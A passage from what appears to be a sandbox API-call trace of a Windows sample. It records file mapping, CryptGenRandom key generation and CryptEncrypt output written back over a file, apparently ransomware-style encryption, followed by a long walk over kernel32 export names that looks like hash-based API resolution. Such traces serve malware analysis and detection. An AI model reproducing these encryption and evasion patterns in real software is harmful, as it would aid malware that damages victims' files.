lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0083.927] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=36800) returned 1 [0083.927] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0083.927] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.927] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.927] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.927] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.927] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0083.927] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.928] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.928] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.929] CloseHandle (hObject=0x42c) returned 1 [0083.929] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.929] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0083.930] CloseHandle (hObject=0x0) returned 0 [0083.930] CloseHandle (hObject=0x428) returned 1 [0083.930] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.930] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.931] GetTickCount () returned 0x114d72d [0083.931] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.931] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.931] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.931] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.931] lstrlenA (lpString="kernel32.dll") returned 12 [0083.931] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.931] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.932] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.932] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.932] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.932] lstrlenA (lpString="ADDATOMA") returned 8 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.932] lstrlenA (lpString="ADDATOMW") returned 8 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.932] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.932] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.932] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.932] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.932] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.932] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.932] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.932] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.932] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.932] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.932] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.932] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.932] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.932] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.933] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.933] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.933] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.933] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.933] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.933] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.933] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.933] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.933] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.933] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.933] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.933] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.933] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.933] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.933] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.933] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.933] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.933] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.933] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.934] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.934] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.934] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.934] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.934] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.934] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.934] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.934] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.934] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.934] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.934] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.934] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.934] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.934] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.934] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.934] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.934] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.934] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.934] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.934] lstrlenA (lpString="BEEP") returned 4 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.935] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.935] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.935] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.935] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.935] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.935] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.935] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.935] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.935] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.935] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.935] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.935] lstrlenA (lpString="CANCELIO") returned 8 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.935] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.935] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.935] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.935] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.935] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.935] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.935] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.936] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.936] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.936] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.936] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.936] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.936] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.936] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.936] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.936] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.936] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.936] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.936] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.936] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.936] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.936] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.936] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.936] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.936] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.936] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.937] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.937] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.937] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.937] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.937] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.937] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.937] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.937] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.937] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.937] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.937] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.937] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.937] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.937] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.937] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.937] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" 